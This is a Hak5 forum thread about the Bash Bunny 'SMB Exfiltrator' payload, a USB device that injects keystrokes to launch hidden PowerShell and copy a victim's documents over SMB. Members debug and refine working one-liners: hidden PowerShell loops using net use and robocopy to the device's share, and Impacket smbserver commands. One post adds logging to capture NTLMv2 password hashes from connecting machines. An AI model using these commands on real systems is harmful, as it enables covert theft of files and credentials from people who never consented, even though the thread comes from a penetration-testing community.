Jump to content

[PAYLOAD] SMB Exfiltrator


Darren Kitchen

Recommended Posts

This payload exfiltrates specified documents to the Bash Bunny via SMB (Windows File Sharing).

https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/smb_exfiltrator

The first stage injects keystrokes into the run dialog. The powershell one-liner wait until the Bash Bunny appears as a network, then copies files and exits. The powershell runs in a minimized state to limit visual impact on the target.

The second stage switches the attack mode from HID to RNDIS_ETHERNET and sets up an SMB server using Impacket. It then waits for files to finish copying from the target to a temp directory. Once exfiltration is complete, files are moved to a named and numbered loot directory on the USB disk partition.

A video walk-through can be found on Hak5 episode 2202:

https://www.youtube.com/watch?v=VPhqD__lOBQ

Version 1.0 of this payload uses conservative delay values and is not optimized yet for speed. A number of powershell aliases and shortcuts can be used to limit the first stage, while the function which waits for files to finish copying can also be improved.

Hope you like guys! Cheers from Indonesia ? --Darren

Link to comment
Share on other sites

Just tried this as my first payload and I was probably a bit over-ambitious, but what-the-heck!

Have I missed something? In the video everything proceeds quite covertly and there is even the option to delete the "run dialog" traces. However when I first tried SMB-Exfiltrator I got the big Windows "Select a Location for the Network... Home Network / Work Network / Public Network" dialog, which is a bit of a giveaway because it's so large.

Also the numbered output folder is created but despite the LEDs indicating that a transfer is in progress and then complete, no files are ever "delivered". And there ARE files to deliver, I put them in there. After that I tried other payloads that have outputs to storage and none ever wrote anything other than the output directory to the "loot" folder. I see on the forum that others seem to be experiencing this.

Still troubleshooting but thought I'd shout out in case anyone else has got any pointers.

(Testing on Win7x64 and using the latest bashbunny-payloads-master.zip)

Link to comment
Share on other sites

On 3/22/2017 at 7:45 PM, Darren Kitchen said:

This payload exfiltrates specified documents to the Bash Bunny via SMB (Windows File Sharing).

https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/smb_exfiltrator

The first stage injects keystrokes into the run dialog. The powershell one-liner wait until the Bash Bunny appears as a network, then copies files and exits. The powershell runs in a minimized state to limit visual impact on the target.

The second stage switches the attack mode from HID to RNDIS_ETHERNET and sets up an SMB server using Impacket. It then waits for files to finish copying from the target to a temp directory. Once exfiltration is complete, files are moved to a named and numbered loot directory on the USB disk partition.

A video walk-through can be found on Hak5 episode 2202:

https://www.youtube.com/watch?v=VPhqD__lOBQ

Version 1.0 of this payload uses conservative delay values and is not optimized yet for speed. A number of powershell aliases and shortcuts can be used to limit the first stage, while the function which waits for files to finish copying can also be improved.

Hope you like guys! Cheers from Indonesia :) --Darren

Did you have an issue running `ATTACKMODE HID RDNIS_ETHERNET`?

I am trying to write a simply payload that requires both, but it seems windows doesn't like that combo although it shows supported on the wiki. I may have to borrow your approach.

Link to comment
Share on other sites

Have worked out that \$ENV:UserProfile\Documents only works on computers using the standard C:/User/username/Documents.

Attempting to use ([environment]::getfolderpath("mydocuments")) as this seems to work even if the documents is on a network drive or another hard drive.

Cant seem to get it to run

QUACK STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy ([environment]::getfolderpath("mydocuments")) \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""

I'm assuming my character escaping is incorrect but not exactly sure, using robocopy with this get folder path command works fine directly in powershell.

 

Any help guys?

Link to comment
Share on other sites

1 hour ago, Problex said:

Have worked out that \$ENV:UserProfile\Documents only works on computers using the standard C:/User/username/Documents.

Attempting to use ([environment]::getfolderpath("mydocuments")) as this seems to work even if the documents is on a network drive or another hard drive.

Cant seem to get it to run


QUACK STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy ([environment]::getfolderpath("mydocuments")) \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""

I'm assuming my character escaping is incorrect but not exactly sure, using robocopy with this get folder path command works fine directly in powershell.

 

Any help guys?

Fixed the issue by swapping the double Quotation marks

[environment]::getfolderpath("mydocuments")

For Single Quotation marks

[environment]::getfolderpath('mydocuments')

And it works!

I also saved some characters by changing the guest username for smb to just g and renaming $EXFILTRATE_FILES to $EX in the powershell script and bash at the top of the script

QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e g /USER:g; robocopy ([environment]::getfolderpath('mydocuments')) \\\172.16.64.1\e $EF /S; exit } }\""

I guess I should have a go at putting this on Github..

Link to comment
Share on other sites

18 hours ago, aethernaut said:

Just tried this as my first payload and I was probably a bit over-ambitious, but what-the-heck!

Have I missed something? In the video everything proceeds quite covertly and there is even the option to delete the "run dialog" traces. However when I first tried SMB-Exfiltrator I got the big Windows "Select a Location for the Network... Home Network / Work Network / Public Network" dialog, which is a bit of a giveaway because it's so large.

Also the numbered output folder is created but despite the LEDs indicating that a transfer is in progress and then complete, no files are ever "delivered". And there ARE files to deliver, I put them in there. After that I tried other payloads that have outputs to storage and none ever wrote anything other than the output directory to the "loot" folder. I see on the forum that others seem to be experiencing this.

Still troubleshooting but thought I'd shout out in case anyone else has got any pointers.

(Testing on Win7x64 and using the latest bashbunny-payloads-master.zip)

I have the exact same problems, output folder is created but nothing gets copied over. 

Link to comment
Share on other sites

1 hour ago, pman said:

I have the exact same problems, output folder is created but nothing gets copied over. 

Me too..... lights are all in-line with the readme, turns green when done

 zero pdfs in the created loot folder even though there are pdfs in the documents folder.  Running on win10

Link to comment
Share on other sites

You can use this helper to debug:

https://github.com/bg-wa/bashbunny-payloads/blob/bunny_debug_helpers/payloads/library/bunny_debug_helpers.sh

1.) Include the helper at the top of your script:

source bunny_debug_helpers.sh

2.) Pepper your script with log entries to see where events succeed.

debug_log "Attack Mode Set" #ln. 41
debug_log "IP Address : ${TARGET_IP}" #ln 92

3.) Plug in Bunny... bash bash bash...

4)  When finished, set the Bunny to arming mode and view your debug logs in the newly created "Debug" folder.

Link to comment
Share on other sites

2 hours ago, bg-wa said:

You can use this helper to debug:

https://github.com/bg-wa/bashbunny-payloads/blob/bunny_debug_helpers/payloads/library/bunny_debug_helpers.sh

1.) Include the helper at the top of your script:


source bunny_debug_helpers.sh

2.) Pepper your script with log entries to see where events succeed.


debug_log "Attack Mode Set" #ln. 41

debug_log "IP Address : ${TARGET_IP}" #ln 92

3.) Plug in Bunny... bash bash bash...

4)  When finished, set the Bunny to arming mode and view your debug logs in the newly created "Debug" folder.

Did you submit a pull request for the debug helper?? That's extremely handy and should be in the main repository at some point I hope :)

Link to comment
Share on other sites

On 24/03/2017 at 5:52 PM, Problex said:

Fixed the issue by swapping the double Quotation marks


[environment]::getfolderpath("mydocuments")

For Single Quotation marks


[environment]::getfolderpath('mydocuments')

And it works!

I also saved some characters by changing the guest username for smb to just g and renaming $EXFILTRATE_FILES to $EX in the powershell script and bash at the top of the script


QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e g /USER:g; robocopy ([environment]::getfolderpath('mydocuments')) \\\172.16.64.1\e $EF /S; exit } }\""

I guess I should have a go at putting this on Github..

Push request created #134

Problex Github Fork

Pretty sure this will fix the issues people are having with empty loot folders as I was getting the same symptoms e.g green light and empty folder with pc name.

Link to comment
Share on other sites

On 3/22/2017 at 8:45 PM, Darren Kitchen said:

This payload exfiltrates specified documents to the Bash Bunny via SMB (Windows File Sharing).

https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/smb_exfiltrator

The first stage injects keystrokes into the run dialog. The powershell one-liner wait until the Bash Bunny appears as a network, then copies files and exits. The powershell runs in a minimized state to limit visual impact on the target.

The second stage switches the attack mode from HID to RNDIS_ETHERNET and sets up an SMB server using Impacket. It then waits for files to finish copying from the target to a temp directory. Once exfiltration is complete, files are moved to a named and numbered loot directory on the USB disk partition.

A video walk-through can be found on Hak5 episode 2202:

https://www.youtube.com/watch?v=VPhqD__lOBQ

Version 1.0 of this payload uses conservative delay values and is not optimized yet for speed. A number of powershell aliases and shortcuts can be used to limit the first stage, while the function which waits for files to finish copying can also be improved.

Hope you like guys! Cheers from Indonesia :) --Darren

/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' e /root/loot/smb_exfiltrator/temp/ &

"That Place Where I Put That Thing That Time" - Love it. Lol. I don't care what anyone says. I still love that movie.

Link to comment
Share on other sites

So I was reading through the payloads people have and seen when people use impacket's smbserver.py, they forget one thing that can get for free also with the file upload.  I will give you the changed commandline below for the smbserver line.

pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' e /root/loot/smb_exfiltrator/temp/ >> /root/loot/smb_exfiltrator/smb.log &

Impacket's smbserver will grab ntlmv2 creds from windows machines that connect through it and output to stdout.  All I am doing here is piping that to a log file in your payload's loot folder.  :-)

Link to comment
Share on other sites

  • 2 weeks later...
  • 1 month later...

My apologies if this has already been covered, but I have not seen anything addressing this specific issue.  Also, as a disclaimer, I am new to Bash Bunny.

When I copy the payload for this to Switch 2, safely eject the Bunny, move the switch to the Switch 2 position, and then re-insert it, the Bunny LED, turn green, the blinks white a few times, and then starts blinking blue and never stops.

I am using the Bunny on a Windows 10 machine.   I can see some scripts quickly flashing up on the screen and then going away, but clearly the Bunny never finishes its task.

Any thoughts on what I'm missing?   I made sure to load Impacket ahead of time.

Link to comment
Share on other sites

  • 2 weeks later...
On ‎13‎/‎06‎/‎2017 at 9:02 PM, twc said:

My apologies if this has already been covered, but I have not seen anything addressing this specific issue.  Also, as a disclaimer, I am new to Bash Bunny.

When I copy the payload for this to Switch 2, safely eject the Bunny, move the switch to the Switch 2 position, and then re-insert it, the Bunny LED, turn green, the blinks white a few times, and then starts blinking blue and never stops.

I am using the Bunny on a Windows 10 machine.   I can see some scripts quickly flashing up on the screen and then going away, but clearly the Bunny never finishes its task.

Any thoughts on what I'm missing?   I made sure to load Impacket ahead of time.

Same.

Some interesting thoughts in this thread. How to fix not sure yet.  Its getting stuck and is never getting out of the following 'while loop'. To fix we have to find out why.

---------------

LED B 100
# Wait until files are done copying.
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done

---------------

Is this because the ps script has not run?, or SMB server is not running? something else?

Link to comment
Share on other sites

I redid this payload to fit into the BBTPS.  One issue I did run into is some Windows 10 machines will prompt for smb creds always.  Working on that part because I want it to try and use the existing user creds to try and grab hash at the same time but looks I need to put in to detect if I need to use a default cred or not.  I did see a post above talking about another set of unescaped double quotes which would break the string and script.

Link to comment
Share on other sites

  • 3 weeks later...
  • 11 months later...
  • 1 year later...

Hi Guys,

I am new here and trying to get a better SMB2 exfiltration. However I run into slowness (about 30s-1min) when Powershell tries to connect to the impacket smbserver. (I tried to work this around for a while).

Could there be a reliable and faster way to do this than with my code snippet there ?

 

ATTACKMODE HID RNDIS_ETHERNET
...

...

RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"while(!(Test-Path \\\\$HOST_IP\\s)){net use \\\\$HOST_IP\\s /user:$USERNAME $PASSWORD}; ...
...
/tools/impacket/examples/smbserver.py -smb2support -comment '' s /loot/smb >> /loot/smbserver.log &
...

 

Thank you.

Link to comment
Share on other sites

  • 1 month later...

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...